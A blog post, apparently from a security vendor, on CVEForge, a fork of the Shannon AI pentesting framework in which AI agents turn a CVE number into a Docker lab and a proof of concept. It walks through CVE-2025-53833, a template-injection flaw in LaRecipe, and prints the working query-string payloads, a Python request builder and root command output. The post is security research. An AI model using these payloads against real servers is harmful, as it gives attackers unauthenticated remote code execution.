After the GVFS experiment, we had a question that wouldn’t go away. That was one prompt, one CVE, one lucky afternoon. What if we could do it for any CVE? Feed it a number, walk away, come back to a complete lab and a working PoC?
We didn’t want to build it from scratch. We wanted to find something that already worked and bend it.
Shannon
If you haven’t seen Shannon, you should. It’s an open-source autonomous AI pentesting framework built by Keygraph. You give it a URL and a source repo, and it runs 13 agents across 5 phases, including reconnaissance, vulnerability analysis, exploitation, and reporting, all orchestrated through Temporal with Claude under the hood. It has crash recovery, parallel agent execution, audit logging, git checkpoints per agent, MCP tool integration, the works.
We’d been watching the project for a while. What struck us wasn’t just that it worked - it’s how it worked. The architecture is beautifully domain-agnostic under the surface. The agent execution engine doesn’t know it’s doing pentesting. It takes a name, loads a prompt, runs Claude with MCP tools, validates the output, commits the result. The Temporal workflow just sequences phases. The prompt system does variable substitution and partial includes. All the pentest-specific knowledge lives in the prompts and the agent registry - not in the infrastructure.
That’s the kind of design you can fork.
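To make the prompt-system idea concrete, here is a minimal Python sketch of variable substitution plus partial includes. It is not Shannon's code: the `@include(name)` directive, the `${var}` placeholders, and the function names are all assumptions chosen for illustration, and Shannon's real template syntax may differ.

```python
import re
from string import Template
from typing import Dict

# Hypothetical include directive: @include(partial_name)
INCLUDE = re.compile(r"@include\((\w+)\)")


def expand_includes(text: str, partials: Dict[str, str], depth: int = 0) -> str:
    """Recursively replace @include(name) with the named partial's text."""
    if depth > 5:
        raise ValueError("partial includes nested too deeply")
    return INCLUDE.sub(
        lambda m: expand_includes(partials[m.group(1)], partials, depth + 1),
        text,
    )


def render_prompt(template: str, partials: Dict[str, str], variables: Dict[str, str]) -> str:
    """Expand partials first, then substitute ${var} placeholders once."""
    return Template(expand_includes(template, partials)).substitute(variables)


partials = {"rules": "Work only inside ${workspace}."}
template = "Analyze ${cve_id}.\n@include(rules)"
prompt = render_prompt(
    template,
    partials,
    {"cve_id": "CVE-2025-53833", "workspace": "/workspace"},
)
```

Because nothing in this layer mentions pentesting, swapping the prompt files and variables is enough to retarget it, which is the property the fork relies on.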
The Fork
We copied Shannon and started ripping out everything web-pentest-specific. The 13 agents became 6. The Playwright browser MCP server became the EIP MCP server. Nmap, subfinder, and WhatWeb got replaced with Docker CLI access. The URL input became a CVE number. The vulnerability queue became a workspace directory.
What we kept was everything that made Shannon good: the Temporal orchestration, the agent execution lifecycle, the audit logging, the error handling with automatic retries, the git checkpoint system, the prompt engine. Roughly 60% of the codebase carried over unchanged. Shannon’s authors built something genuinely reusable, and we’re grateful for it.
The new pipeline has six agents: five sequential phases plus one conditional agent:
- Intel - Queries the EIP MCP server for the full CVE brief. Finds the source repo, clones it, checks out the vulnerable version.
- Analysis - Reads the fix diff, traces the vulnerable code path, identifies the root cause, assesses whether the fix is complete.
- Lab Build - Generates Dockerfiles and docker-compose.yml, builds containers for both vulnerable and patched versions, verifies they start.
- PoC & Verify - Writes a standalone exploit script, tests it against the vulnerable container (must succeed), tests against the patched container (must fail).
- Report - Generates a README with the full writeup.
- Bypass (conditional) - If the analysis flagged the fix as potentially incomplete, attempts to construct an input that evades it.
Each agent gets the deliverables from the previous phase. The intel agent’s brief feeds the analysis. The analysis feeds the lab builder. The lab builder’s container IPs feed the PoC writer. It’s a pipeline where each stage builds on real artifacts, not summaries.
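The hand-off between stages can be sketched roughly as below. This is an illustrative Python model, not CVEForge's Temporal workflow: the `Phase` class, the `should_run` hook, the stub agents, and the `INCOMPLETE` marker are all hypothetical.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List

Deliverables = Dict[str, str]


def always(_: Deliverables) -> bool:
    """Default condition: the phase always runs."""
    return True


@dataclass
class Phase:
    name: str
    run: Callable[[Deliverables], str]                # stands in for one agent
    should_run: Callable[[Deliverables], bool] = always


def run_pipeline(phases: List[Phase], cve_id: str) -> Deliverables:
    """Run phases in order; each one sees every earlier deliverable."""
    deliverables: Deliverables = {"cve_id": cve_id}
    for phase in phases:
        if not phase.should_run(deliverables):
            deliverables[phase.name] = "skipped"
            continue
        deliverables[phase.name] = phase.run(deliverables)
    return deliverables


# Stub agents standing in for the real Claude-backed ones.
phases = [
    Phase("intel", lambda d: f"brief for {d['cve_id']}"),
    Phase("analysis", lambda d: f"COMPLETE: root cause from {d['intel']}"),
    Phase("lab", lambda d: "containers up"),
    Phase("poc", lambda d: f"exploit tested against: {d['lab']}"),
    Phase("report", lambda d: "README.md written"),
    Phase(
        "bypass",
        lambda d: "bypass attempt",
        # Only runs if the analysis flagged the fix as incomplete.
        should_run=lambda d: d["analysis"].startswith("INCOMPLETE"),
    ),
]
result = run_pipeline(phases, "CVE-2025-53833")
```

In this stubbed run the analysis reports the fix as complete, so the bypass phase is recorded as skipped rather than executed.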
The First Real Run
We needed a test case. Something with enough complexity to be interesting but not so obscure that the agent would be flying blind. We picked CVE-2025-53833 - a Server-Side Template Injection in LaRecipe, a Laravel documentation package. CVSS 10.0. Unauthenticated RCE via a single GET request. And crucially: zero existing working PoC code in the wild.
EIP had the CVE brief, the GHSA advisory, and a writeup - but no runnable exploit. The one public GitHub repository tagged for this CVE was classified as a writeup, not a working PoC. So this wasn’t a case of the agent copying someone else’s exploit. It would need to understand the vulnerability from the advisory and source code, then write one from scratch.
We typed one command:
./cveforge start CVE=CVE-2025-53833
Then we watched the logs.
What Happened Next
The intel agent pulled the full brief from EIP in its first tool call. CVE details, CVSS vector, CWE classification, fix commit hash, exploit analysis, Nuclei templates. It cloned the LaRecipe repo, found the fix commit (c1d0d56), identified the vulnerable version (2.8.0) and the patched version (2.8.1). Three and a half minutes.
The analysis agent read the fix diff and traced the attack chain:
GET /docs/1.0/overview?{{system('id')}}
-> replaceLinks() injects raw URI into HTML content
-> renderBlade() -> Blade::compileString()
-> eval('?'.'>'.$content)
-> RCE
The method replaceLinks() used request()->getRequestUri() - which includes the query string - to build anchor links in rendered documentation. That query string passed through Laravel’s Blade template engine and got eval()’d. The fix switched to getPathInfo(), which strips the query string. Six minutes for the full analysis, including fix completeness assessment.
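The difference between the two accessors is easy to see in isolation. The sketch below is a Python analogy, not the PHP implementation: `request_uri` and `path_info` are hypothetical helpers that mimic what the text describes (path plus query string versus path only), and the host name is a placeholder.

```python
from urllib.parse import urlsplit


def request_uri(url: str) -> str:
    """Analogue of getRequestUri(): path plus the raw query string."""
    parts = urlsplit(url)
    return parts.path + ("?" + parts.query if parts.query else "")


def path_info(url: str) -> str:
    """Analogue of getPathInfo(): path only, query string dropped."""
    return urlsplit(url).path


url = "http://lab.example/docs/1.0/overview?{{system('id')}}"

vulnerable_base = request_uri(url)  # attacker-controlled text survives
patched_base = path_info(url)       # attacker-controlled text is gone

print(vulnerable_base)
print(patched_base)
```

Anything built from the first value carries the `{{ ... }}` directive into content that is later compiled as a template; anything built from the second does not.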
Then the lab agent started building Docker containers. This is where it got interesting.
The Struggle (Honest Version)
The lab agent hit three problems that we hadn’t anticipated.
Problem 1: Docker-in-Docker networking. The CVEForge worker runs inside a Docker container. The lab containers it builds are sibling containers on the host Docker daemon. Port mappings like 8080:80 expose to the host machine, not to the worker container. The agent tried curl http://localhost:8081 and got connection refused. It took about fifteen turns before it figured out to use docker inspect to get container IPs and curl those directly.
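The workaround for Problem 1 can be sketched in a few lines of Python. This is an illustration, not the agent's actual commands: the function names and the sample network name are hypothetical, and it assumes the worker can route to the network the lab containers are attached to. The JSON path used (`NetworkSettings.Networks.<network>.IPAddress`) is the one `docker inspect` emits.

```python
import json
import subprocess
from typing import Dict


def container_ips(inspect_json: str) -> Dict[str, str]:
    """Extract {network name: IP} from `docker inspect <container>` output."""
    info = json.loads(inspect_json)[0]  # inspect returns a JSON array
    networks = info["NetworkSettings"]["Networks"]
    return {
        name: net["IPAddress"]
        for name, net in networks.items()
        if net.get("IPAddress")
    }


def inspect_container(name: str) -> Dict[str, str]:
    """Call the Docker CLI and parse the result (requires Docker access)."""
    out = subprocess.run(
        ["docker", "inspect", name],
        check=True,
        capture_output=True,
        text=True,
    ).stdout
    return container_ips(out)


# Offline example with a trimmed-down inspect payload.
sample = '[{"NetworkSettings": {"Networks": {"lab_default": {"IPAddress": "172.18.0.2"}}}}]'
ips = container_ips(sample)
```

The worker then targets the container IP on the container's own port (80 in the `8080:80` example) instead of `localhost` and the host-side port.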
Problem 2: Composer blocks vulnerable packages. When the agent tried to composer require binarytorch/larecipe:2.8.0, Composer refused - the package has a known security advisory. The agent had to discover the --no-audit flag on its own.
Problem 3: PHP 8.1 broke an old dependency. ParsedownExtra, a Markdown library that LaRecipe depends on, has an undefined array key access that’s harmless on PHP 7.x but throws a fatal ErrorException on PHP 8.1+ because Laravel’s error handler converts warnings to exceptions. The agent tried suppressing it via error_reporting ini settings. That didn’t work - Laravel overrides error_reporting at runtime. Eventually it figured out the right fix: patch the source directly with sed.
None of these problems were in the prompt. The agent debugged them live, iterating through solutions until it found ones that worked. Fourteen minutes for the lab build, including all the false starts.
After the run, we baked all three lessons into the prompts so future agents don’t waste turns on the same issues. That’s the loop: run, learn, encode, run again.
The PoC
The PoC agent read the previous deliverables, confirmed the containers were running, and wrote a standalone Python exploit. No external dependencies - just stdlib (socket for raw TCP, re for output extraction).
It used raw sockets instead of http.client because Python 3.13+ rejects { and } in URLs. The payload is a Blade echo directive injected via the query string:
GET /docs/1.0/overview?{{system('id')}} HTTP/1.1
For commands with spaces, it wraps in PHP’s urldecode():
GET /docs/1.0/overview?{{system(urldecode('uname%20-a'))}} HTTP/1.1
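As a rough illustration of how such a request line can be assembled for the lab containers, the sketch below percent-encodes the command and wraps it in `urldecode()`. It is not the generated `poc.py`: `build_request` is a hypothetical helper, the extra headers are assumptions, and it only builds bytes without sending anything.

```python
from urllib.parse import quote


def build_request(host: str, command: str, path: str = "/docs/1.0/overview") -> bytes:
    """Build the raw HTTP/1.1 request bytes for the lab test described above."""
    # Percent-encode everything so spaces and quotes never appear raw in the URL.
    encoded = quote(command, safe="")
    payload = "{{system(urldecode('" + encoded + "'))}}"
    lines = [
        f"GET {path}?{payload} HTTP/1.1",
        f"Host: {host}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


request = build_request("172.18.0.2", "uname -a")
first_line = request.split(b"\r\n", 1)[0].decode("ascii")
print(first_line)
```

Writing these bytes to a plain TCP socket sidesteps any URL validation in a higher-level HTTP client, which is the design choice the PoC agent made.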
Seven tests. Four against the vulnerable container - id, whoami, uname -a, hostname - all returning command output. Three against the patched container - all blocked. The PoC agent verified the fix works exactly as described: getPathInfo() strips the query string, so the payload never reaches the template engine.
[+] VULNERABLE! Command output extracted:
uid=0(root) gid=0(root) groups=0(root)
[+] Server-Side Template Injection confirmed - RCE achieved!
Six minutes and forty seconds for the PoC, including writing the script, testing all seven cases, and generating the verification report.
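The pass/fail rule behind those seven tests can be written down compactly. The sketch below is an assumption-laden model of it: `verify_fix` and the `run_exploit` callback are hypothetical, and since the post does not say which three commands were run against the patched container, the list used here is a guess.

```python
from typing import Callable, Optional

VULNERABLE_COMMANDS = ["id", "whoami", "uname -a", "hostname"]
PATCHED_COMMANDS = ["id", "whoami", "uname -a"]  # assumption: not stated in the post

# run_exploit(target, command) returns command output, or None if blocked.
Exploit = Callable[[str, str], Optional[str]]


def verify_fix(run_exploit: Exploit, vulnerable: str, patched: str) -> bool:
    """True only if every test succeeds on vulnerable and fails on patched."""
    vulnerable_ok = all(
        run_exploit(vulnerable, cmd) is not None for cmd in VULNERABLE_COMMANDS
    )
    patched_ok = all(
        run_exploit(patched, cmd) is None for cmd in PATCHED_COMMANDS
    )
    return vulnerable_ok and patched_ok


def fake_exploit(target: str, command: str) -> Optional[str]:
    """Stand-in for the real PoC: 'works' only against the vulnerable target."""
    return f"output of {command}" if target == "vulnerable" else None


verified = verify_fix(fake_exploit, "vulnerable", "patched")
```

Requiring failure on the patched container is what separates a verified PoC from one that merely gets some response back.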
The Numbers
| Phase | Agent | Duration | Cost |
|---|---|---|---|
| Intel | intel | 3m 31s | $0.86 |
| Analysis | analysis | 6m 5s | $1.03 |
| Lab Build | lab | 14m 46s | $3.16 |
| PoC & Verify | poc | 6m 40s | $2.21 |
| Report | report | 1m 33s | $0.45 |
| Bypass | bypass | skipped | - |
| Total | | 32m 37s | $7.71 |
The bypass agent was skipped because the analysis concluded the fix was complete. getPathInfo() never includes query parameters - there’s no way to sneak a payload through the patched code path. The correct call for this CVE.
What Came Out
The pipeline produced a complete package:
- README.md - Full writeup with root cause analysis, lab setup instructions, PoC usage, verification results, fix explanation
- poc/poc.py - Standalone RCE exploit, zero dependencies, works against any LaRecipe < 2.8.1 instance
- lab/ - Docker Compose environment with vulnerable (v2.8.0) and patched (v2.8.1) containers
- deliverables/ - Intel brief, vulnerability analysis, lab build report, PoC verification report
The full lab and PoC are on GitHub.
What the EIP MCP Server Did
Same pattern as the GVFS experiment. The MCP connection gave the intel agent everything in its first tool call - severity, CWE, fix commit, affected versions, existing exploit analysis, Nuclei templates, upstream references. No tab-switching, no copy-pasting from five different sources.
But this time it wasn’t just one agent using it. The intel agent queried get_vulnerability, get_exploit_analysis, get_exploit_code, and get_nuclei_templates - all in the first three minutes. The PoC agent used get_exploit_analysis to check if the existing public writeup was safe to reference (not a trojan). The intelligence flowed through the pipeline as context, not just as a starting point.
What Shannon Made Possible
We want to be clear about this: we didn’t build an autonomous agent framework. Shannon’s team did. We took their architecture - the Temporal orchestration, the agent execution lifecycle, the MCP integration, the audit system, the retry logic, the prompt engine - and repointed it at a different problem. The hard infrastructure work was already done.
What we contributed was the domain adaptation: six new agent prompts, EIP MCP wiring, Docker socket access for lab building, the CVE-specific workflow, and the lessons-learned loop. That’s meaningful work, but it’s built on a foundation that somebody else designed and tested extensively.
If you’re building anything that involves autonomous AI agents running in sequence with tools, crash recovery, and audit logging, Shannon is worth studying. The architecture is clean and the code is readable. We learned a lot from it.
What’s Next
CVEForge is rough. The prompts need more iterations across different vulnerability classes - we’ve only tested it on one CVE end-to-end. The lab build phase is the slowest and most fragile, because build systems vary enormously. The error handling around Docker networking needs work. The cost ($7.71 per run with Opus) could come down with smarter model routing.
But it works. One CVE number in, complete PoC lab out. 32 minutes, fully autonomous, for a CVSS 10.0 vulnerability that had no existing public exploit.
We’ll release CVEForge once we’ve polished it - run it against a wider range of CVEs, harden the prompts, clean up the rough edges. In the meantime, if you want to try the piece that makes the intelligence layer work, the EIP MCP server is free and open.
One CVE number. Six agents. Old-school exploit development, automated.
CVEForge Series:
- From CRLF Injection PoC to Fix Bypass - the one-prompt precursor
- CVE-2025-53833: From CVE Number to Root Shell in 32 Minutes - you are here
- Zero to RCE: Three Vulnerability Classes - three CVEs, three PoCs, one bypass
- OneBlog: 3 Bypasses in 5 Runs - the Java case study
- Foreman & Telnetd - two CVEs, two very different fixes
- 72 Hours, 24 CVEs - the stress test
- The One That Failed - when the pipeline hits a wall